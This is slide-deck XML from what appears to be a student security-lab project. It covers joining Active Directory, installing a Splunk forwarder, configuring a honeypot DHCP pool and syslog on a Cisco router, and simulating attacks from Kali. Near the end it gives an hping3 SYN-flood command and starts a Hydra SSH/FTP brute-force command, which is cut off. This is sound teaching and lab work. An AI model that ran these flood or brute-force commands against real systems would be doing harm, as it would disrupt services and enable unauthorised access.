                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Discover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Join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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>the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Active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Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-11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Domain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500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
            </a:pP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realm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discover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SWAP-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ANTON.LOCAL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command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were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able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probe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network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to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>find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Active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Directory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domain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configuration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details,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including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its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realm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name,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domain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name,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and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>server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software.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="381000">
              <a:lnSpc>
                <a:spcPct val="109100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="815"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>To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join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domain,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realm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50" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>join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SWAP-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ANTON.LOCAL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command.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verified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 spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>integration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45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> the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command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id</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Administrator@SWAP-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>ANTON.LOCAL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45" b="1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7913378"/>
            <a:ext cx="5888355" cy="113665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000" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SplunkForwarder</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-16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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Setup</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-16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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-16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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>10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Downloading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Installing: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200" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>We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downloaded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60">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>MSI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package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for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Splunk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Forwarder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onto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Windows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10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machine.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44880"/>
            <a:ext cx="3516629" cy="27774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355335"/>
            <a:ext cx="5336286" cy="251040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906526"/>
            <a:ext cx="5840730" cy="92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3695">
              <a:lnSpc>
                <a:spcPct val="109200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Following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basic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installation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wizard,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we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went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ahead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with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installation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process, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>providing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Admin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username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password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along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with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accepting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license.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9200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="815"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>During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configuration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process,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provided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receiving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indexer's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IP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address,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which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in our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case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was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192.168.1.100,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Ubuntu1.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4295731"/>
            <a:ext cx="5801360" cy="153987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Adding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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Local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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Windows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Logs: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700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="475"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-60">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>After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installation,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we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added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local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Windows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logs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that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wanted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to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send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to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 spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>server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into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C:\Program </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Files\splunkforwarder\etc\apps\search\local\inputs.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-5" b="1" i="1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file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of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Splunk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Forwarder.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="17780">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="805"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>This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step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ensured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that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relevant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logs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were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being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sent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to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Splunk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server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for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analysis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and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>monitoring.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50720"/>
            <a:ext cx="3028950" cy="23581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986230"/>
            <a:ext cx="3522216" cy="17682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865" y="1954402"/>
            <a:ext cx="3102610" cy="236029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85800"/>
            <a:ext cx="5821045" cy="2338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7359">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Honeypot</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DHCP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-20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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="229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2000" spc="-1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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Syslog</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Configuration</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>vRouter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Configuring</a:t>
            </a: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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DHCP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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Pool: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900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="475"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>For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testing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honeypot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functionalities,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created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65">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DHCP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pool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named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"LOCAL"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on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 spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>vRouter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which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Cisco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IOS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75">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>router.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114">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>To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keep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control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over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network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assignment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ensure specific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addresses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remain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untouched,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we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excluded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following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IP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addresses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in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 spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>screenshot.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We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then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configured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network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range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of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pool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75" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>132.1C8.1.0/24</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-75">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>.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 spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>output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of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b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>show</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-85" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-30" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-70" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-380" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-80" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="65" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-80" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>dhcp</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-70" b="1" i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command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also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all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commands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we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ran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for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45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>DHCP </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>server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setup.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921590"/>
            <a:ext cx="5678170" cy="1240155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Configuring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vRouter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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Syslog</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-14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Messages</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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Forwarding: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700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="490"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>We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configured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vRouter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to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send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its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syslog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messages</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> to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192.168.1.101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(ubuntu2).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Syslog </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>messages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were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set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to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be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sent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up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to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notifications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level.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This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ensures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that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important </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>system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notifications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events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are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captured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sent.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The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output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of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b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>show</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-90" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-30" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-90" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-380" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>|</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-90" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="15" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="15" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-35" b="1" i="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>logging</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1200" spc="-80" b="1" i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command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also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all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commands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we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ran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to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forward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logs.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238245"/>
            <a:ext cx="6422390" cy="23291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276109"/>
            <a:ext cx="4929632" cy="151828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746126"/>
            <a:ext cx="5734050" cy="196342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000" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Simulating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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-18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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-19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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1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E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>METRO!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METRO!!</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1600" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="0E466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500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Anton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created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bash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script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automate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execution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simulated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attacks,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aiming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make </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>them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more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beginner-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>friendly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for </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>others.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script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simplifies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execution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of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multiple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attacks, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>offering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approachable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environment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both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testing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educational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purposes.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="14604">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="805"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Usage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of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METRO!!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made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simple.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Download</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>,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install</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-40">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>,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choose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attack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>.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 spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Simple.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A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-85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short </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" u="none" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>installation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and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usage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 spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>guide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has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20">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>been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30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>provided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35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>in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45">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>the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repository.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271612"/>
            <a:ext cx="1811655" cy="65087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600" spc="-80">
                <a:solidFill>
                  <a:srgbClr val="0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Simulated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Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-114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0E4660"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>List:</a:t>
            </a:r>
            <a:endParaRPr sz="16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69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Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SYN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Flood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Attack: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822448"/>
            <a:ext cx="4993640" cy="27181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655817"/>
            <a:ext cx="3896360" cy="265048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24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908659"/>
            <a:ext cx="5735320" cy="779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7865" marR="5080" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="109100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef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SYN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flood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overwhelms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target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server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flood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TCP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SYN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packets, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>exhausting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its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resources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causing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it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become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unresponsive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legitimate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traffic.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="697865" indent="-228600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697865" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Hping3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for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following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</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="1155065" indent="-228600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1155065" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>hping3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>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>c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$packets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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>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$size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 spc="95">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>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-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>p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$port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--</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-30">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>flood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$target_ip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0">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-50">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>V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1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100" spc="80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SSH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FTP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Brute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Force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Attack:</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="697865" marR="119380" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:tabLst>
                <a:tab pos="697865" algn="l"/>
              </a:tabLst>
            </a:pP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attempts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gain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unauthorized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access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80">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SSH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FTP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servers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by</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="1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trying </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-55">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>different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username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password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combinations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until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successful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login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is </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-10">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>achieved.</a:t>
            </a:r>
            <a:endParaRPr sz="11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697865" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-25">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Hydra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following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command:</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1155065" marR="673735" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1450"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="60"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="1155065" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1100" spc="-35">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>hydra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-</a:t>
